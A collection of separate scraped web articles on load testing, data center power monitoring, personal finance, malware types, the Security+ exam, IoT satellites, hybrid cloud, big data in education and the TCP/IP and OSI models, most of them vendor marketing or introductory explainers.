iBeta Quality Assurance can work within your development and testing cycles. We have an extensive infrastructure perfect for load testing, which we use to determine if your product can handle everyday stress. Click here to learn more about our Load/Performance Testing services. | <urn:uuid:826a3d35-197c-4ff0-895c-0ad639c04315> | CC-MAIN-2022-40 | https://www.ibeta.com/what-is-load-testing-and-why-is-itnecessary/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00787.warc.gz | en | 0.918037 | 520 | 2.53125 | 3 |
Power Density In the Past
Here’s How it Works
Evolution of Power Density and Data Center Energy Consumption
Let’s take a look at historical data center energy use.
Challenges with Increasing Power Density
Power And Cooling
CPU consumption will grow as real servers become overburdened with virtual machines. The increased power demand can average approximately 20% when these devices go from 5-10% utilization up to 50% of utilization. This power consumption can be increased even further by the additional CPU and memory utilization.
In the data center, virtualization has created several new issues. High-density cabinets now require more power than traditional low-density. Due to the increased power consumption, electricians need to rewire cables to accommodate the capacity load. Or, it is smarter to migrate your load into a much-equipped data center.
Because of the increased power density in data centers as a result of virtualization, cooling issues may arise. High-density machines may generate more heat in a smaller space, making it more difficult to disperse. Hotspots in your data center may come out as a result of this.
AKCP Power Monitoring
AKCP, the world’s oldest and largest supplier of networked wired and wireless sensor solutions, has launched a free online PUE calculator to check your data center efficiency and identify potential savings.
Power Usage Effectiveness (PUE) is a popular metric that measures how efficient your data center operation is. It’s a ratio of the amount of energy spent on cooling vs the amount of energy spent on the IT load. A PUE of 1.0 means your data center runs on totally free cooling. A PUE of 2.0 means you spend an equal amount of energy on cooling as you do on IT load.
A well-designed and run data center can obtain a PUE of 1.2 – 1.3. However, most smaller edge data centers and in-house computer rooms have PUE numbers of 2.0 and above.
AKCPro Server is an ideal DCIM solution. Perfect for those people who don’t have the budget or need for complex DCIM software, but require a capable monitoring system for their data center. With many advanced features such as Cabinet Thermal Mapping, Drill Down Mapping, Graphing, VPN connections to remote sites, AKCPro Server is the ideal choice. AKCPro Server is capable of live PUE calculations, so you can see real-time the effect of the changes you make on your PUE.
Power Monitoring Sensor
The AKCP Power Monitor Sensor gives vital information and allows you to remotely monitor power. This eliminates the need for manual power audits as well as provides immediate alerts to potential problems. The AKCP Power Monitor Sensor is specifically designed to be used with AKCP sensorProbe+ and securityProbe base units. It has been integrated into the sensorProbe+ and securityProbe web interface with its own “Power Management” menu, allowing multiple three-phase and single-phase Power Monitor Sensors to be set up on a single sensorProbe+ or securityProbe depending on which readings are required. Please check the sensorProbe+ Modbus manual or the PMS manuals on our website for more detailed information on this. Power meter readings can also be used with the sensorProbe+ and AKCPro Server lives PUE calculations that analyze the efficiency of power usage in your data center. Data collected over time using the Power Monitor sensor can also be viewed using the built-in graphing tool.
Avoid Hotspots with AKCP
The AKCPro airflow sensor is designed for systems that generate heat in the course of their operation. So, a steady flow of air is necessary to dissipate this heat. System reliability and safety could be jeopardized if this cooling airflow stops.
The Airflow sensor is placed in the path of the air stream, where the user can monitor the status of the flowing air. The airflow sensor is not a precision measuring instrument. This device is meant to measure the presence or the absence of airflow.
Cabinet Analysis Sensor
Airflow and Thermal Mapping for IT Cabinets
The Cabinet Analysis Sensor (CAS) features a cabinet thermal map for detecting hot spots and a differential pressure sensor for analysis of airflow. Monitor up to 16 cabinets from a single IP address with the sensorProbeX+ base units. The Wireless Cabinet Analysis Sensor is also available using our Wireless Tunnel™ Technology.
Differential Temperature (△T)
Cabinet thermal maps consist of 2 strings of 3x Temp and 1x Hum sensor. Monitor the temperature at the front and rear of the cabinet, top, middle, and bottom. The △T value, front to rear temperature differential is calculated and displayed with animated arrows in AKCPro Server cabinet rack map views.
Differential Pressure (△P)
There should always be a positive pressure at the front of the cabinet, to ensure that air from hot and cold aisles is not mixing. Air travels from areas of high pressure to low pressure, it is imperative for efficient cooling to check that there is higher pressure at the front of the cabinet and lower pressure at the rear.
Rack Maps and Containment Views
With an L-DCIM or PC with AKCPro Server installed, dedicated rack maps displaying Cabinet Analysis Sensor data can be configured to give a visual representation of each rack in your data center. If you are running a hot/cold aisle containment, then containment views can also be configured to give a sectional view of your racks and containment aisles. | <urn:uuid:77142ac2-c0f7-4e83-8976-8de0247fbe90> | CC-MAIN-2022-40 | https://www.akcp.com/articles/power-consumption-and-power-density/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00787.warc.gz | en | 0.903839 | 1,160 | 2.578125 | 3 |
Let’s begin with defining Finance, “It is a comprehensive phrase that fully specifies explicit activities linked with banking, leverage or debt, credit, capital markets and investments, basically, it reflects the entire money management and the procedure of obtaining money according to requirement. However, Finance comprises monetary learning, and the study of banking, credit, investment, equities, and liabilities that entirely build the financial structure.”
Finance is an extremely important aspect in everybody life, but do you want to know how it is manageable and doable at a corporeal grade, or simply at the personal stage, probably, you would say "yes". So, Without further delaying, voyaging the Personal Finance monarchy
Table of Content
- Introduction to Personal Finance
- Importance of Personal Finance
- Types & Examples
- Process & Strategies
Introduction to Personal Finance
A generic definition of personal finance is, “maintaining your own money throughout your life.” However, the authentic interpretation incorporates all the features and aspects of managing the income including various strategies and status of risk for distinct facets of life and different amounts of investments.
In simple words, “It involves the understanding of the facts like how everyday spending affects our accounts, the utility of credit cards, how varying interest rates could make or break our portfolios”. These fundamental concepts assist in framing a picture of how stable an individual is financially and more importantly how to raise that stability in the future.
“Personal Finance is made up of various parts, but can be summarized as budgeting, setting spending and saving priorities, cash flow planning, and efficiently maximizing benefits through rewards programs.” – Anthony G. Lanza, Spectra Investment Management
It's all about actualising personal financial objectives whether it is adequate savings for short-terms financial demands, retirement planning, savings for kid’s education, etc. It completely relies on one’s income, expenditures, living expenses and requirements, essential demands, the individual targets along with the decisions made for meeting these targets within financial confinements.
Some practical examples of personal finance are;
Learning how to budget, balance a cheque book, secure funds for important purchases, saving for retirement, planning for taxes, insurance purchasing and making efforts for investments.
Planning with the family on how the total income could be divided for mortgage or kid’s education, medical expenses, etc.
Deciding or debating whether to save or not a particular amount on some expenditures or save it for the future.
According to the definition provided by Investopedia, “Personal finance explains all the financial decisions and actions accounted by an individual or household that comprise budgeting, insurance, mortgage planning, savings and retirement planning.”
Primarily, personal finance deals with
- Family budgets,
- Personal savings and investments, and
- The utilization of credit cards.
Most of the Individuals certainly get mortgages from commercial banks, savings and loan associations in order to purchase their own homes, while financing the purchase of consumer items such as automobiles or appliances can be collected from banks and finance firms.
Additionally, charge accounts and credit cards are other significant modes by virtue of which most banks and businesses render short-term credits to consumers.
(Recommended blog: 5 Key Elements of Financial Analysis)
Personal Finance Terms
Budget: While managing personal finances, budget is important in maintaining the record of spending patterns, it helps in planning how one could go with spending according to the income each month. It basically tells where is your money is going, when and where you can save, and how can you manage expenditures.
Insurance: In terms of managing personal finances, taking up the insurance is another part. One can protect itself via purchasing health insurance, life-term insurance, car insurance, etc, from risk and providing securities to material things also.
Savings: In our 20’s we just learn about personal savings, but with the entering in our 30’s we start planning about managing our funds, seek ways to invest correctly and save for retirement or old ages. Hence, it becomes necessary to make emergency savings funds to mask any financial discomforts and retirement saving plans to aid in future.
Importance of Personal Finance
Personal Finance has become an integral part of human life, and in the present COVID-19 world, it has become more necessary than ever before. (Click here to understand the concept of how COVID-19 is impacting Financial Markets)
Below are some of the imperative aspects of finance at a personal level;
Personal Finance has a great role in determining the direction and essence of human life in the prevailing economic and social circumstances.
For personal growth of an individual and his family, personal finance plays a key role by looking at the opportunities and keeping upgraded across the globe through keeping aware of any sort of risks.
It has become more crucial to enrich the financially literate in order to acquire most of the income and needed savings where the study of personal finance assists in distinguishing amid favourable and cheap financial decisions and also help in making savvy conclusions.
Some of the seminaries are providing classes about managing money, therefore, it is important to have basic knowledge through free online courses, articles, blogs and podcasts.
In addition to that, a novel concept, small personal finance incorporates augmenting strategies, these strategies consist of budgeting, preparing emergency funds, clearing off debt, carefully leveraged credit cards, saving for retirement, and etc.
In addition to that, knowing the fundamentals of personal finance from savings accounts to budgeting can help us in constructing a better future by eliminating the various risks.
(Related blog: An Introduction to Financial Analysis)
What are the Personal Finance Principles?
When a person thinks to manage his/her money, one of the finest approaches is “saving”, it can be strictly followed, “more you save, more you have”. However, principles that help to maintain success in business are discussed below;
Assessment: The key requirement for professionals that resist them spreading too much. However, enthusiastic persons have always listed various ideas and ways that touch their financial needs, either it is a side business or investment idea at the appropriate time.
Understating to restraint expenditure on non-profitable assets until a person has secured his monthly savings or debt-reduction aims is important in keeping net worth. Restraint is simply the way of managing a successful business, applied to personal finance as well.
(Recommend blog: Fundamental Analysis Guide)
Besides that, one should follow the saying, “never work for money, make your money works for you”, therefore, produce multiple, but legitimate, ways to have more source of income. Also, it is advisable to make you educated with financial terms and keep updating yourself to have a precise understanding of your financial matters and make accurate decisions for yourself.
Personal Finance: Principles and Types
What are the Types of Personal Finance?
Some types of personal finance can be accomplished as;
- Banking, that depicts the fundamental banking functionalities of managing accounts and transactions assistance.
- Investment, that is made by judging the entire alternatives and picking out the suitable path which provides the acceptance of a specific measure of risk, like the investment in real estate, stock market, fixed deposit, etc.
- Mortgages and loans, that signifies the assistance and services letting a person leverage and obtain an asset for getting its objective. For example, acquiring a home loan or education loan for fulfilling his aspirations.
- Expert advice or counselling, that can be gained for analyzing the exact picture and getting the actual perspective of the situation to catch. Along with this, it serves as a guiding tool and the latest outlook.
Process of Personal Finance
Simply, the process of personal finance can be explained as follows;
Studying the current condition: Figuring out the exact existing conditions in terms of where we stand, how the current situation is being handled in order to acquire a precise knowledge of the strengths and weaknesses.
Preparing up doable goals: Setting up objectives according to the preferences is necessary for deciding in which direction the next step should be placed, or where an individual should move forward in future.
Determining all courses of actions: Pinpointing the required plan and process should be captured in the current scenario and analysing the time-frame work, expenses, and opportunities interconnected with each and every individual subject of actions.
Checking out the alternatives: Deciding the full recognized alternatives and checking the pros and cons provided the inadequacy of resources. Also, selecting the alternative through moderating the perils to a satisfactory level.
Applying a suitable area of action: It is a high time to seize an action, making the investments and performing the conventionalities.
Following up is pivotal: The necessary step is to follow up. Since the conditions are altering elementary and in the terms of changing environment, one should be dynamic adequately and should analyze the options from time to time in order to obtain the best results.
Personal Finance Strategies
Some top-notch personal finance strategies to follow;
Planning for a budget is a very important task and evaluating how much amount should be spent on which activities. For example, some fraction of total income must be expended on essential activities like rent, groceries, and how much should be spent on convenience and savings.
With the holding of a credit card, one can get spur-of-the-moment purchases that yield in trapping in its own frame. Therefore, wisely implementation of credit cards is imperative in order to avoid ample troubles.
In addition to that, the conceptual knowledge of credit score is important. One should maintain a satisfactory credit score that supports in sustaining high-grade creditworthiness.
One of the important viewpoints is mitigating the debt, this is considered as the best approach in propelling a step ahead.
Considering the factor of retirement policy and planning is worthy. Initiating by implanting or investing appropriately and making scopes or expenses for retirement.
Understanding and acquiring the tax system of an individual’s country could aid in a vast portion of savings by making correct tax planning, expert advice is also beneficial to the regard.
Having suited insurance is a key ingredient in case of emergency and to avoid unexpected loss and concussions.
The last but most important strategy is having savings for emergency conditions including medical bills, a big loss like accidents etc. (In reference with)
(Also check: Financial Analysis: Types, Examples and Techniques)
In today’s environment, financial management has turned out to be the utmost significance. There are plenty of options available to professionally manage all personal finances and banking, even most of the banks are rendering such services where they can manage money successfully.
Presently, personal finance is a very broad realm in itself. It can be concluded that Personal finance could be addressed as the management of money and financial decisions for an individual or for a family covering budgeting, retirement planning and investments.
“Being promoted to a top position in your organization, or even being elected to public office, does not suddenly endow you with financial literacy, if you did not acquire and develop it, earlier in your life.” – Strive Masiyiwa, founder of Econet Wireless
In spite of all the reliable resources, it is advisable to account for a worthwhile personal finance approach. One should be prudent enough to obtain finance literary knowledge in order to make acceptable decisions in this direction while maintaining money adequate. | <urn:uuid:8ee29f3d-d114-4499-8df1-122b759e683f> | CC-MAIN-2022-40 | https://www.analyticssteps.com/blogs/what-personal-finance-importance-types-process-strategies | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00787.warc.gz | en | 0.934798 | 2,402 | 3.4375 | 3 |
Malicious software, or malware for short, is used by cybercriminals in a wide variety of campaigns and strategies involving extortion and data theft, among other misdemeanours. Malware comes in many forms, each with its own purpose and attack vector. Today, we’re going to explore some of the different threats enterprises should be aware of:
Ransomware is a kind of crypto malware. It employs encryption in order to disable a firm’s access to its own data. The target organisation may be rendered totally or partially unable to function until it pays the requested ransom. However, no guarantee exists that paying will result in the firm receiving the decryption key necessary to access files and systems once more.
Worms are aimed at OS vulnerabilities that allow them to install themselves inside networks. They can gain access by several avenues like via flash drives, backdoors and unintentional weaknesses in software. Once installed, threat operators use worms to steal data, launch ransomware or conduct DDoS attacks.
Trojan are malicious programs disguised as authentic software or useful code. Once unsuspecting users download it, the Trojan takes control of a victim’s device or system. They can be hidden in apps, games and software patches, or simply embedded in email attachments as part of phishing scams.
Computer viruses are a kind of code that can insert itself into an app. They then execute when the application is run. From inside the network, a virus can launch attacks like worms, cause chaos for companies or steal private data.
Spyware is designed to gather information about victims without them ever knowing. Once installed on a user’s device it can collect a wide range of data and transmit it back to a threat operator. This information may include a users’ online activity and internet surfing habits, but can also include their unstructured messages, payment details, personal pin numbers, log in and password data.
It is worth noting that the use of malicious spyware is no longer limited to simply desktop browsers it can also infect other user interfaces like critical applications and devices such as smartphones.
Finally, fileless malware does not initially install anything on company devices and systems; it instead makes alterations to existing files that are native to a device’s operating system. Examples include WMI and PowerShell. Due to the fact that the operating system recognises the altered files as authentic, this fileless attack cannot typically be caught by common types of antivirus software. Furthermore, because of the stealthy nature of these malicious attacks, they are around 10 times more likely to be successful than conventional malware attacks.
At Galaxkey, we specialise in providing cybersecurity solutions for enterprises seeking to keep the data they retain on record safe. From cutting-edge electronic signatures to powerful but easy-to-use encryption, our expertly developed platform provides companies with the specialist toolkit they need to protect sensitive content being stored or shared.
Why not contact us today for a free 14-day trial? | <urn:uuid:7aca3d67-2b0f-4731-a77e-e8ec140f7c3a> | CC-MAIN-2022-40 | https://www.galaxkey.com/blog/is-your-firm-malware-aware/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00787.warc.gz | en | 0.92501 | 630 | 3.21875 | 3 |
Security + new exam version is SY0-601. In this new version, we have 5 domains:
In this blog, we discuss domain 3.0 Implementation.
For a company’s security program, implementation is critical. It is the point at which a security system or technology comes into being, a new security effort is nothing but a collection of thoughts on a document if it isn’t put into action. In this domain, we cover 9 objectives and their subtopics.
The objectives covered in security+ domain 3.0 are listed below.
1. Implement Secure Protocols
Cyber attackers can take advantage of insecure protocols to damage data security and the integrity of systems. In this lesson, you’ll learn about some of the protocols and services that provide network hosts with addressing, name resolution, and monitoring. These protocols aren’t as visible as apps like web servers and email servers, but they’re essential for securing networks.
This lesson covers two parts: Protocols and Use case. Inside Protocols we learn Domain Name System (DNS), DNS Security Extensions (DNSSEC), Secure Real-time Transport Protocol (SRTP), File Transfer Protocol (FTPS), SSH File Transfer Protocols (SFTP), Understand Simple Network Management Protocol (SNMP) framework, Hypertext Transfer Protocol (HTTP), we can cover email service protocols, secure POP3 (Post Office Protocol v3), Secure IMAP (Internet Message Access Protocol v4). We understand Internet Protocol Security (IPSec) and its 2 Protocols:
In Use case part we learn how security protocols work inside this we cover:
2. Implement Host or Application Security Solutions
This lesson is concentrated on which security solutions are implemented for various hosts and applications. Inside this lesson, we cover Endpoint Protection, Boot Integrity, Application Security, Hardening.
In Endpoint Protection we can understand Antivirus and Anti-Malware, NGFW (Next-generation firewall), Host-based intrusion detection system (HIDS), Endpoint detection and response (EDR), Data Loss Prevention (DLP). Boot Integrity covers Boot Security, Unified Extension Firmware Interface (UEFI), work of Measured boot and Boot Attestation.
Inside Application security we learn Input Validation, Secure Cookies, HTTP Headers, we understand Allow list, Block list, Dynamic Code analysis.
3. Implement Secure Network Designs
Networks are as prevalent in the business as computers themselves. As a result, understanding secure network designs is essential for creating a protected network for your company. In this lesson we understand the working of Load balancing, Network segmentation, Virtual local area network (VLAN), we learn the difference between Extranet and Intranet. Cover the working of VPN (Virtual Private Network), DNA, also cover Network access control (NAC), Access control list (ACL). We will also understand the use of Port security.
4. Install and Configure Wireless Security Settings
Wireless security is becoming very important in the field of information security. In this lesson, we learn Cryptographic protocols, WiFi protected Access 2 (WAP2) and WiFi protected access 3 (WAP3), Simultaneous Authentication of Equals (SAE). We also cover Authentication protocols, Extensible authentication protocol (EAP), Protected Extensible Authentication Protocol (PEAP), IEEE 802.1X. We understand the Methods of configuring wireless security and Installation considerations, WiFi Protected Setup (WPS), Site surveys, WiFi analyzers, Wireless access point (WAP) placement.
5. Implement Secure Mobile Solutions
In this lesson, we will understand the concept of Connection methods and receivers. Inside this concept, we cover Cellular, WiFi, Bluetooth, NFC, Infrared, Point to Point, Point to multipoint. We learn Mobile device management (MDM), Application management, Content management, Remote wipe, Geofencing, Screen lock, Biometrics, Storage segmentation. We cover Deployment models, BYOD (Bring your own device), Corporate-owned personally enabled (COPE), Choose your own device (CYOD), Virtual desktop infrastructure (VDI).
6. Apply Cybersecurity Solutions to the Cloud
In this lesson, we will learn the use of Cloud security controls, Cybersecurity solutions, and Cloud-native controls vs third-party solutions. In Cloud Security controls we will cover several sub-topics like High availability across zones, Storage, Network, Compute. And inside Cybersecurity solutions, we cover Application security, Next-generation secure web gateway (SWG), Firewall considerations in a cloud environment.
7. Implement Identity and Account Management Controls
In this lesson, we will learn 3 topics: Identity, Account types, and Account policies. In the first topic Identity, we cover Identity providers (IdP), know about Identity Attributes, how the tokens are used, SSH keys, and Smart cards. In the second topic, we cover types of accounts, User account, Guest accounts, Service accounts. Inside Account policies, we cover Account permissions, Access policies, Password complexity, Time-based logins, Account audits.
8. Implement Authentication and Authorization Solutions
In this lesson, we will learn Authentication management, Password keys, Password vaults, TPM, Knowledge-based authentication. We will cover Authentication/authorization, inside this topic we will understand Challenge-Handshake Authentication Protocol (CHAP), Password Authentication Protocol (PAP), Terminal Access Controller Access Control System Plus (TACACS+), Kerberos, OpenID. We also cover Access control schemes and their subtopics Attribute-based access control (ABAC), Role-based access control, Rule-based access control, Privileged access management, Filesystem permissions.
9. Implement Public Key Infrastructure
In this lesson, we will cover the concept of Public key infrastructure (PKI), Key management, Certificate authority (CA), Certificate revocation list (CRL), use of Certificate attributes, Online Certificate Status Protocol (OCSP), Certificate signing request (CSR). We learn types of certificates, Wildcard, Subject alternative name, Code signing, Domain Validation, Extended validation. We also cover formats of certification and Concepts of certification changing, Key escrow, online vs offline CA.
Learn Security+ With Us
Infosec Train is a leading provider of IT security training and consulting organization. We have certified and experienced trainers in our team whom you can easily interact with and solve your doubts anytime. If you are interested and looking for live online training, Infosec Train provides the best online security+ certification training. You can check and enroll in our CompTIA Security+ Online Certification Training to prepare for the certification exam. | <urn:uuid:e59245cd-642c-482c-b227-dd6d0ff1277c> | CC-MAIN-2022-40 | https://www.infosectrain.com/blog/comptia-security-sy0-601-domain-3-implementation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00787.warc.gz | en | 0.832004 | 1,385 | 2.65625 | 3 |
Canada-based Helios Wire is planning to launch 30 satellites into space in a bid to ‘democratize the Internet of Things (IoT) from space’.
Helios Wire says the satellites will be used to monitor five billion sensors on Earth in a bid to significantly reduce the cost of IoT.
Two satellites will be launched in 2018, with a further 28 launched over the following three years, for less than $100 million according to a report in the Vancouver Sun.
Will Helios Wire disrupt IoT?
The network will use 30 MHz of priority mobile satellite system (MSS) S-band spectrum to build a two-way global satellite-enabled system.
This is the same infrastructure used for enabling pan-European mobile services. Crucially, it allows for very low-cost short bursts of data to low-power devices – which could reduce the cost of IoT.
According to Helios’ website, the small transmitters on Earth will collect information such as location, infrastructure reliability, crop health, asset elevation, or almost any other digital information.
That information is then relayed up to the satellites. These satellites pick up the signals and data from the ground based transmitters and forward that down to antennas on the ground, where it is then uploaded to a cloud-based analytics platform that should allow for better information and decisions.
The technology to ‘democratize the IoT’
In comments made to the Vancouver Sun, Helios CEO Scott Larson said: “S-Band spectrum is really well-suited to short pings of data and it will allow us to connect a huge number of devices. It’s going to allow us to build out a space-enabled IoT network.”
Larson believes early adopters will be farmers using precision agriculture systems or utilities using smart meters.
He adds that “the system is particularly well-suited to monitoring things that are remote or moving over large distances,” which could prove useful for anything from emergency services personnel to conservation groups in Africa.
“Space is hard, but it’s getting easier and we think we have the technology now to really democratize the Internet of Things,” he finished.
Helios Wire has secured $1 million in initial funding, but will undertake several further financing rounds over the course of the coming year. | <urn:uuid:e1f8bc58-ce6e-439d-b087-edd3ce1e3e64> | CC-MAIN-2022-40 | https://internetofbusiness.com/helios-wire-democratize-iot-space/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00787.warc.gz | en | 0.93067 | 485 | 2.546875 | 3 |
The agreement extension will enable the agency to access the company's RapidEye and PlanetScope offerings to inform research projects in the coming months, Planet said Tuesday.
NASA employed PlanetScope in 2020 to assess landslide hazards in the Himalayas as well as the collapse of the last Arctic ice sheet. The agency also identified burned area models of wildfires and helped farmers in Africa seek watering holes for goats, donkeys and cattle using the satellite imagery from the technology.
Other collaborations include the company providing data to NASA to help track airport and traffic changes and explore the effects of the COVID-19 pandemic.
NASA's Harvest program also used satellite imagery to provide a country-wide cropland map to the Togolese government to support aid distribution efforts. | <urn:uuid:e55e4d31-da2b-4656-b39d-9481a3ebfdfa> | CC-MAIN-2022-40 | https://blog.executivebiz.com/2021/01/planet-nasa-extend-satellite-imagery-partnership/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00787.warc.gz | en | 0.909587 | 153 | 2.875 | 3 |
Hybrid Cloud Definition
Hybrid-cloud A hybrid cloud architecture is mix of on-premises, private, and public cloud services with orchestration between the cloud platforms. Hybrid cloud management involves unique entities that are managed as one across all environments.
What is Public vs. Private vs. Hybrid Cloud?
Innovations in the cloud have resulted in a move from single-user private clouds to multi-tenant public clouds and hybrid clouds. This evolution in cloud infrastructure has seen an increase in the use of hybrid cloud solutions. The cloud types have the following differences:
• Private Cloud: Serves a single-user. It can be self-hosted or hosted by a cloud provider.
• Public Cloud: These represent infrastructure-as-a-service offerings purchased from Amazon, Google, IBM or Microsoft.
• Hybrid Cloud: Hybrid cloud architecture combines two different types of infrastructure into a single heterogeneous environment. It can be any combination of a traditional data center, private cloud, and public cloud. Even though these environments remain different, they can work together effectively and function as one environment.
What are Some Hybrid Cloud Examples?
Hybrid cloud architecture works well for the following industries:
• Finance: Financial firms are able to significantly reduce their space requirements in a hybrid cloud architecture when trade orders are placed on a private cloud and trade analytics live on a public cloud.
• Healthcare: When hospitals send patient data to insurance providers, hybrid cloud computing ensures HIPAA compliance.
• Legal: Hybrid cloud security allows encrypted data to live off-site in a public cloud while connected o a law firm’s private cloud. This protects original documents from threat of theft or loss by natural disaster.
• Retail: Hybrid cloud computing helps companies process resource-intensive sales data and analytics.
What is Hybrid Cloud Strategy?
Tech professionals use hybrid cloud strategy in the following ways, according to a 451 Research report:
• Dynamically move workloads to the most appropriate IT environment based on cost, performance and security.
• Utilize on-premises resources for existing workloads, and use public or hosted clouds for new workloads.
• Run internal business systems and data on premises while customer-facing systems run on infrastructure as a service (iaaS), public or hosted clouds.
Increasingly, a hybrid cloud model is called a hybrid cloud environment. This environment strategy involves running applications in different environments with multiple public and private cloud vendors, while each element lives in one hybrid domain.
Why use Hybrid Cloud?
Hybrid cloud architecture allows an enterprise to move data and applications between private and public environments based on business and compliance requirements.
For example, customer data can live in a private environment. But heavy processing can be sent to the public cloud without ever having customer data leave the private environment. Hybrid cloud computing allows instant transfer of information between environments, allowing enterprises to experience the benefits of both environments.
Hybrid cloud benefits include the following management tools:
• Choice: The additional choice of multiple environments provides flexibility and the ability
to avoid vendor lock-in.
• Disaster Avoidance: Multiple environments ensures compute resources are always available to avoid downtime due to natural disaster or human error.
• Compliance: Many hybrid cloud environments can help enterprises achieve their goals for governance, risk management and compliance regulations.
How does Avi Networks Help with Hybrid Cloud Deployments?
With enterprises running their applications in a mix of private data centers and multiple public cloud environments, choices for application services are increasingly driven by technologies that can be infrastructure agnostic and those that have uniform architecture and user experience irrespective of the environment.
For more on the actual implementation of load balancing, security applications and web application firewalls check out our Application Delivery How-To Videos.
For more information on hybrid cloud deployments see the following resource: | <urn:uuid:4992d827-fc95-4dd0-a594-6695dc3d9b2c> | CC-MAIN-2022-40 | https://www-stage.avinetworks.com/glossary/hybrid-cloud/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00787.warc.gz | en | 0.888019 | 781 | 2.96875 | 3 |
The Internet population is growing very fast. Apparently, by 2017, the online community already reached 3.7 billion, and the numbers are still growing:
All these people produce tons and tons of data, passing over this information to other Internet users. Reportedly, we produce over 2.5 quintillion data on average every day.
The bigger half of this data belongs to the most active Internet users, among which are school and college students. Looking for, processing, and working with the information online, they leave digital breadcrumbs that become a part of big data, collected every day. This data, as a consequence, impacts education, changing it, and bringing both advantages and disadvantages.
However, before we get into the good and the bad, let’s clarify what big data is.
“Big data contains a great variety of information that arrives in increasing volumes and velocity.”
Thus, big data is more voluminous, than traditional data, and includes both processed and raw data.
Commonly, this data is too large and too complex to be processed by traditional software. Besides, such amounts of information bring many opportunities for analysis, allowing you to take a glance at a specific concept from many different perspectives.
It is traditionally considered (and suggested by Oracle in the article, mentioned above) that big data is described by three main concepts: volume, velocity, and variety. However, these three concepts do not adequately describe the phenomenon of big data without the fourth and fifth components, which are variability and veracity.
Here’s how all these components contribute to big data:
Now that we gave the big data an in-depth look let’s talk more about its impact on education and the benefits and harms that it brings along.
Big data has brought significant changes to many aspects of education. According to a study, published by the Publications Office of the European Union, the most significant change brought by the big data to education, is the ability to monitor educational systems.
Here are some examples of how it works:
Al these implementations are the benefits of the influence of big data on the education system. These systems generate tons of big data themselves, keeping all parties of the educational process regularly updated.
The feature of automation, brought by these big-data-based systems, has itself resulted in many other benefits, like:
The massive volumes of data bring much value for both educators and students.
Indeed, big data can bring solve many issues that educators struggled with a few decades ago. However, is it harmless? Not quite. Let’s take a look at the dark side of the big data and its possible negative impact on education to evaluate some of the biggest risks.
The biggest issue, however, is ethical, and it deals with the misuse of personal information. For instance, the error in using the SNAPP system, mentioned above, can result in the massive leakage of personal data.
Due to the lack of proper treatment and protection, personal information stored in data centers and used for analytical purposes in education still can be misused. With the risks of data theft increasing, this issue undoubtedly remains to be solved.
While having obvious benefits for the education system, big data still has many drawbacks, linked to the lack of technology to process it and put it to use. These disadvantages, though, bring a lot of data themselves that can be learned from.
The analysis of big data depends on many factors, like transparency, value to both the learner and the educator, expense, and openness. Taking these features into consideration, when working with big data in education will allow you to benefit from this data to the maximum extent.
As a verdict, the influence of big data and its use in education is still the subject of research. However, with further development, big data analysis can be effectively put to use and bring even more benefits for students and educators. | <urn:uuid:abbc2804-75fb-427d-9e86-61142752bf93> | CC-MAIN-2022-40 | https://www.colocationamerica.com/blog/big-data-and-education | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00787.warc.gz | en | 0.956941 | 811 | 3.53125 | 4 |
In the previous section, we learned that TCP/IP is a suite of protocols and rules. It allows us to communicate with other computers and devices over a connection oriented network. What we didn’t cover was the TCP/IP and OSI model- which helps us understand the TCP/IP suite in a manner of layers and modules.
The TCP/IP Model and Modular Design
TCP/IP is responsible for a wide range of activity: it must interface with hardware, route data to appropriate places, provide error control, and much more. If you are starting to think the TCP/IP suite can get confusing, you wouldn’t be the first.
The developers of TCP/IP thankfully designed what we call a modular design- meaning that the TCP/IP system can be divided into separate components. You may call these layers or modules. But why use a modular design? Not only does it aid in the education process, but it also lets manufacturers easily adapt to specific hardware and operating system needs.
For example- if we had a token ring network and an extended star network, we surely wouldn’t want to create entirely different network software builds for each one. Instead, we can just edit the network layer, called the Network Access Layer, to allow compatibility. Not only does this benefit manufacturers, but it greatly aids networking students in education. We can dissect the TCP/IP suite into different layers, and then learn about each layer’s specifics one at a time. Below you’ll see the TCP/IP model divided into four layers.
- Network Access Layer – The Network Access Layer is fairly self explanatory- it interfaces with the physical network. It formats data and addresses data for subnets, based on physical hardware addresses. More importantly, it provides error control for data delivered on the physical network.
- Internet Layer – The Internet Layer provides logical addressing. More specifically, the internet layer relates physical addresses from the network access layer to logical addresses. This can be an IP address, for instance. This is vital for passing along information to subnets that aren’t on the same network as other parts of the network. This layer also provides routing that may reduce traffic, and supports delivery across an internetwork. (An internetwork is simply a greater network of LANs, perhaps a large company or organization.)
- Transport Layer – The Transport Layer provides flow control, error control, and serves as an interface for network applications. An example of the transport layer would be TCP- a protocol suite that is connection-oriented. We may also use UDP- a connectionless means of transporting data.
- Application Layer – Lastly, we have the Application Layer. We use this layer for troubleshooting, file transfer, internet activities, and a slew of other activities. This layer interacts with many types of applications, such as a database manager, email program, or Telnet.
The above layers are more complex than the general descriptions provided, but rest assured, we will get into the specifics in later sections. For now we have another model to learn- the OSI model.
The Open System Interconnection Model
The Open System Interconnection Model, more commonly known as simply OSI, is another model that can help break the TCP/IP suite into modules. Technically speaking, it is exactly the same as the TCP/IP model, except that it has more layers. This is currently being pushed by Cisco since it aids in learning the TCP/IP stack in an easier manner. Likewise, you will see the OSI model on many Cisco exams.
Instead of four layers, the OSI model has seven. You can see a direct comparison of the two models below; notice that only the Application Layer and Network Layer are divided into smaller layers, and the Internet Layer is renamed to the “Network Layer.”
